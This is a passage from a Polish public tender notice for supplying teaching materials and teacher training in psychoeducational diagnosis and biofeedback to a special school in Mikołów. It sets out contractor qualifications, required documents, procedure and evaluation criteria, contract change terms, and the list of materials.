3.     Szkolenie przeprowadzi osoba posiadająca wymagane uprawnienia i doświadczenie w zakresie objętym szkoleniem.
3.	Szkolenie realizowane będzie na terenie i w budynku wskazanym przez Wykonawcę;
4.	Wykonawca zapewnia salę szkoleniową, materiały dydaktyczne, przerwy kawowe i obiad;
5. 	Kurs zakończony ma być egzaminem, a uczestnik ma otrzymać certyfikat upoważniający                   do prowadzenia diagnostyki, terapii i treningów metodą EEG-biofeedback.
2.2.3.3.2.  W trakcie przerwy w szkleniu Wykonawca zapewni uczestnikom gorące napoje w postaci kawy i herbaty z dodatkami  w postaci  cukru, mleka i cytryny w ilości według uznania konsumenta. Dodatkowo w czasie kursu zapewni  wodę mineralną i sok w butelkach min. 120 ml. W czasie przerwy obiadowej Wykonawca dostarczy uczestnikom gorący posiłek w formie drugiego dania w zamkniętych naczyniach jednorazowych z plastikowymi sztućcami i serwetkami oraz z dodatkiem napoju w formie soku, owocu lub batonika. Posiłek powinien posiadać gramaturę nie mniej niż 450 gram posiłku przygotowanego do spożycia i kaloryczność nie mniej niż 700 kcal; w przypadku dania mięsnego lub rybnego: ziemniaki, kasza, ryż, makaron - nie mniej niż 150 g; mięso- ryba nie mniej niż 150-200g, surówka nie mniej niż 150g.<br /><br /><b>II.5) Główny kod CPV: </b>39162100-6<br /><b> Dodatkowe kody CPV:</b>39162110-9,
                80510000-2,
                48190000-6,
                22110000-4,
                37000000-8,
                48520000-2,
                37524100-8,
                33196200-2<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 90<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie opisuje tego warunku<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie opisuje tego warunku<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający uzna ww. warunek za spełniony, jeśli Wykonawca wykaże, że skieruje do realizacji zamówienia minimum następujące osoby:
dla Zadania I obejmującego szkolenie PEP-R E. Schoplera ,
- skieruje do przeprowadzenia szkolenia 1 osobę z wykształceniem wyższym  pedagogicznym, dysponującą min 5 letnim doświadczeniem w prowadzeniu specjalistycznych szkoleń dotyczących diagnozy funkcjonalnej.
dla Zadania II obejmującego szkolenia nIR HEG BIOFEEDBACK i BIOFEEDBACK I stopień.
-skieruje do przeprowadzenia szkolenia z zakresu nIR HEG BIOFEEDBACK minimum 1 osobę z wykształceniem wyższym  pedagogicznym, dysponującą min. 3 letnim doświadczeniem w prowadzeniu szkoleń z zakresu  nIR HEG BIOFEEDBACK, która w podanym okresie przeprowadziła min. 5 szkoleń.-skieruje do przeprowadzenia szkolenia z zakresu BIOFEEDBACK I stopień minimum 1 osobę                z wykształceniem wyższym  pedagogicznym, dysponującą min. 3 letnim doświadczeniem w prowadzeniu szkoleń z zakresu BIOFEEDBACK I stopień, która w podanym okresie przeprowadziła min. szkoleń będących przedmiotem zamówienia.
Wykonawca w zadaniu II może podać tą samą osobę, która spełnia oba warunki w zakresie zdolności zawodowej.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"> Zamawiający przed udzieleniem zamówienia, wezwie Wykonawcę, którego oferta została najwyżej oceniona do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 Pzp                w szczególności odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej jeżeli odrębne przepisy wymagają ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 Pzp. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w powyższym  punkcie składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w zdaniu pierwszym, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji lub jego oświadczeniem osoby, której dokument miał dotyczyć, złożonym przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. Dokumenty, o których mowa w zdaniu pierwszym i drugim, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców dokumenty o których mowa w pkt III.1 niniejszego rozdziału SIWZ należy złożyć odnośnie każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Jeżeli okaże się to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie zamówienia, Zamawiający może na każdym etapie postępowania wezwać wykonawców do złożenia wszystkich lub niektórych oświadczeń lub dokumentów potwierdzających, że nie podlegają wykluczeniu, spełniają warunki udziału w postępowaniu lub kryteria selekcji, a jeżeli zachodzą uzasadnione podstawy do uznania,że złożone uprzednio oświadczenia lub dokumenty nie są już aktualne, do złożenia aktualnych oświadczeń lub dokumentów.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Wypełniony i podpisany formularz ofertowy, stanowiący załącznik nr 1a do SIWZ dla zadania I i zał. 1b do SIWZ dla zadania II.Jeżeli oferta podpisana jest przez osobę inną niż upoważniona do reprezentowania Wykonawcy do oferty należy załączyć pełnomocnictwo (upoważnienie) podpisane przez osoby uprawnione do reprezentowania Wykonawcy w formie oryginału bądź kopii poświadczonej notarialnie. Wykonawca, w terminie 3 dni od zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5, przekazuje Zamawiającemu oświadczenie o przynależności albo braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Prawo zamówień publicznych zgodnie ze wzorem stanowiącym załącznik nr 5 do SIWZ. W przypadku przynależności do tej samej grupy kapitałowej Wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców dokumenty o których mowa w zdaniu pierwszym  należy złożyć odnośnie każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Zamawiający przed udzieleniem zamówienia, wezwie Wykonawcę, którego oferta została najwyżej oceniona do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 Pzp w szczególności odpisu z właściwego rejestru lub z centralnej ewidencji i informacji                                o działalności gospodarczej jeżeli odrębne przepisy wymagają ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 Pzp.
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w powyżej, wykonawca składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w zdaniu pierwszym, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji lub jego oświadczeniem osoby, której dokument miał dotyczyć, złożonym przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. Dokumenty, o których mowa w zdaniu pierwszym i drugim, powinny być wystawione. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców dokumenty o których mowa w pkt III.1 niniejszego rozdziału SIWZ należy złożyć odnośnie każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Jeżeli okaże się to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie zamówienia, Zamawiający może na każdym etapie postępowania wezwać wykonawców do złożenia wszystkich lub niektórych oświadczeń lub dokumentów potwierdzających, że nie podlegają wykluczeniu, spełniają warunki udziału w postępowaniu lub kryteria selekcji, a jeżeli zachodzą uzasadnione podstawy do uznania,że złożone uprzednio oświadczenia lub dokumenty nie są już aktualne, do złożenia aktualnych oświadczeń lub dokumentów nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60.00</td></tr><tr><td>termin realizacji</td><td>40.00</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Zmiana postanowień umowy może nastąpić za zgodą obu Stron wyrażoną na piśmie pod rygorem nieważności z zastrzeżeniem ust. 2
2.	Strony przewidują możliwość zmiany istotnych postanowień Umowy w stosunku do treści Oferty, w następujących okolicznościach:
a) konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia Umowy,
b) jeśli dane pozycje pomocy dydaktycznych, będące przedmiotem umowy, będą niedostępne na rynku w okresie obowiązywania umowy, Zamawiający dopuszcza zaproponowanie przez Wykonawcę innych pomocy dydaktycznych o parametrach i funkcjonalnościach nie gorszych niż określone przez Zamawiającego w niniejszej umowie, a w szczególności w załącznikach do umowy,
c) gdy zmiana postanowień umownych jest korzystna dla Zamawiającego,
d) w przypadku gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyznała środki na współfinansowanie zamówienia na dostawę.
e) w przypadku wystąpienia siły wyższej. Siła wyższa oznacza wydarzenie zewnętrzne, nieprzewidywalne i poza kontrolą stron niniejszej umowy, którego skutkom nie można zapobiec, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu,
f) w przypadku zmiany stanu prawnego, który będzie wnosił nowe wymagania co do sposobu realizacji jakiegokolwiek elementu dostawy,
g) zmiany sposobu rozliczenia umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu, w ramach którego realizowany jest przedmiot zamówienia, zmian wytycznych lub innych dokumentów programowych.
h) w przypadkach przewidzianych w art.144 ust.1 pkt.2 - 6 ustawy Prawo Zamówień Publicznych ( tekst jednolity: Dz. U. z 2015 r., poz. 2164 ze zmianami).<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 05/05/2017, godzina: 09:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 60 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Dostawa materiałów dydaktycznych GRUPA I DIAGNOZA FUNKCJONALNA do ZSS nr 2 Specjalnych w Mikołowie wraz ze szkoleniem pn.: Diagnoza Profilu Psychoedukacyjnego (PEP-R)           E. Schoplera oraz konstrukcja indywidualnych programów edukacyjno-terapeutycznych dla dzieci               z deficytami rozwojowymi od 1 do 12 roku życia  z wykorzystaniem programu komputerowego EDU-4XXL Multimedia oraz programu EDU 2 dla młodzieży dla 4 osób.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiot zamówienia obejmuje dostawę poniższych pomocy dydaktycznych, których szczegółowy opis  zawiera załącznik nr 2a do SIWZ:
1. Zestaw "INSTRUMENTY MUZYCZNE" lub równoważny .
2. ZESZYT ĆWICZEŃ GRAFICZNYCH  nr 1 i nr 2.
3. ZESTAW  MAŁA MATEMATYKA lub produkt równoważny.
4. ZESTAW BAJEK O RYBAKU I ZŁOTEJ RYBCE, CALINECZKA, JAŚ I MAŁGOSIA z płytą CD. 
5. ZESTAW GRA CIAŁA  lub równoważny.
6. Zestawy: SMUTNE I WESOŁE OBRAZY", PRZYMIOTNIKI I STANY EMOCJONALNE do teorii umysłu lub produkt równoważny.
7. Zestaw do diagnozy profilu psychoedukacyjnego dla dzieci- zestaw mat. Graficznych do testu PEP-R.
8. Materiały graficzne do diagnozy młodzieży - do testu AAPEP.
9. Zestaw pomocy do diagnozy do profilu psychoedukacyjnego PEP-R E. Schoplera.
10. ZESTAW - ZABAWY DŹWIĘKONAŚLADOWCZE lub zestaw równoważny
11. ZESTAW WSPOMAGAJĄCY MOWĘ ZESTAW Z LITERKAMI I  RYMOWANKAMI  z płytą CD
12. ZESTAW CZASOWNIKI .
13. ZESTAWY: "SYGNAŁY", MIEJSCA, KUCHNIA, ŁAZIENKA do rozwijania percepcji słuchowej.
14. Program EDU-3 część 1 i część 4 lub równoważne.
15. Program komputerowy EDU - Jurczyszyn - 2 Multimedia lub równoważny ze szkoleniem opisanym poniżej
16. Program EDU 4XXL Multimedia - program do diagnozy i konstrukcji indywidualnych programów edukacyjno-terapeutycznych lub program równoważny.
2.1.2. Szkolenie p.n.:Diagnoza Profilu Psychoedukacyjnego (PEP-R) E. Schoplera oraz konstrukcja indywidualnych programów edukacyjno-terapeutycznych dla dzieci z deficytami rozwojowymi od 1 do 12 roku życia  z wykorzystaniem programu komputerowego EDU-4XXL Multimedia oraz programu EDU 2 dla młodzieży dla 4 osób.
2.1.2.1.Opis szkolenia:
1.	Szkolenie przeznaczone jest dla 4 nauczycieli szkoły specjalnej prowadzącej zajęcia z uczniami posiadającymi orzeczenia o potrzebie kształcenia specjalnego; 
2.	Wymiar szkolenia   minimum 6 h dla każdego z uczestników;
3.	Szkolenie realizowane w miejscu wskazanym przez Zamawiającego w formie warsztatów z diagnozowania;
4. 	Wykonawca zapewnia materiały szkoleniowe oraz dostęp do wszelkich pomocy naukowych oferowanych w ramach szkolenia w tym zasobów biblioteczno-informacyjnych Wykonawcy oraz materiałów dydaktycznych umieszczanych na stronach internetowych i intranetowych Wykonawcy.;
5.	Wykonawca zobowiązuje się do wystawienia certyfikatu potwierdzającego udział w szkoleniu.
Minimalna tematyka szkolenia w zakresie diagnozy PEP-R część 1 :
a) Diagnoza pedagogiczna dziecka do 12 roku życia.
b) Posługiwanie się testem.
c) Ćwiczenia w zakresie realizacji zadań testowych z obszaru rozwoju.
d) Ćwiczenia w zakresie realizacji zadań testowych z obszaru zachowań.
e) Wypełnianie arkuszy ocen.
f) Analiza wyników z obszaru rozwoju.
g) Analiza wyników z obszaru zachowań.
h) Dokumentacja diagnostyczna nanoszenia wyników.
i) Szczegółowa charakterystyka rozwoju na podstawie zebranych z diagnozy informacji
j) Szczegółowa charakterystyka zaburzeń
k) Sformułowanie ogólnych i szczegółowych wniosków z diagnozy. 
2.1.2.3.Minimalna tematyka szkolenia część 2:
a) Rejestracja oprogramowania.
b) Tworzenie dokumentacji dziecka- archiwizacja danych.
c) Wpisanie wyników badania do oprogramowania.
d) Wygenerowanie wyników diagnozy.  
e) Przygotowanie opisu diagnozy z uwzględnieniem deficytów parcjalnych.  
f) Przygotowanie opisu skali zachowam z uwzględnieniem poszczególnych sfer.
g) Przygotowanie szczegółowej oceny reakcji na bodźce
h) Zakończenie diagnozy i jej pisemne podsumowanie.
i) Archiwizacja danych dziecka.
2.1.2.4.Konstrukcja indywidualnego programu edukacyjno  terapeutycznego:
a) Przeniesienie danych z diagnozy do druków Indywidualnego Programu Edukacyjno-terapeutycznego z uwzględnieniem deficytów.
b) Dokładne uzasadnienie terapii z opisem występujących deficytów w poszczególnych ocenianych obszarach.
c) Ustalenie ogólnych i szczegółowych celów terapii w indywidualnym programie edukacyjno  terapeutycznym.
d) Wybranie z bazy konspektów odpowiednich konspektów do terapii.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>39162100-6, 80510000-2,
                    48190000-6,
                    48520000-9,
                    37524100-8,
                    37000000-8,
                    22110000-4,
                    39162110-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
